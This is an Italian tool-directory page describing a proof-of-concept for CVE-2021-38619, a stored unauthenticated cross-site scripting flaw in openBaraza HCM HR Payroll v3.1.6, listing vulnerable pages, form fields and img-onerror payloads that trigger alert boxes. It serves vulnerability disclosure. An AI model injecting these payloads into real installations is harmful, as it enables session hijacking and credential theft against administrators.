Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-38619 — Proof-of-concept per CVE-2021-38619: XSS memorizzato non autenticato in openBaraza HCM HR Payroll v3.1.6, con esempi di payload per il furto di credenziali e il dirottamento della sessione. | Kitploit
Strumenti/GitHubGitHub/charlesbickel/cve-2021-38619
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubcharlesbickel/cve-2021-38619

CVE-2021-38619

Proof-of-concept per CVE-2021-38619: XSS memorizzato non autenticato in openBaraza HCM HR Payroll v3.1.6, con esempi di payload per il furto di credenziali e il dirottamento della sessione.

Vedi Repository
15 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-38619 Vulnerabilità XSS Memorizzata Non Autenticata in openBaraza HCM HR Payroll v.3.1.6

openBaraza HCM v.3.1.6 non neutralizza correttamente l'input controllabile dall'utente, ciò potrebbe consentire a un attaccante remoto non autenticato di condurre un attacco XSS memorizzato (cross-site scripting) contro un utente amministrativo da più pagine. Se un attaccante inietta un payload JavaScript arbitrario nelle pagine vulnerabili e utenti validi tentano di visitare le pagine interessate, il payload verrà eseguito. Ciò potrebbe comportare il furto di credenziali, il dirottamento di sessione o la distribuzione di malware alla vittima.

Crediti dello scopritore: Charles Bickel & Gideon Gray


Pagina vulnerabile: http://serverip:9090/hr/application.jsp

Campi di testo vulnerabili: first_name, surname, email

Payload:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('First');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('Surname');" />
  • [email protected]<img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

Pagina interessata: http://serverip:9090/hr/index.jsp?view=23:0

application.jsp


Pagina vulnerabile: http://serverip:9090/hr/subscription.jsp

Campi di testo vulnerabili: business_name, primary_contact, primary_email, confirm_email

Payload:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('business');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('contact');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

Pagina interessata: http://serverip:9090/hr/index.jsp?view=94:0

subscription.jsp

Scarica lo strumento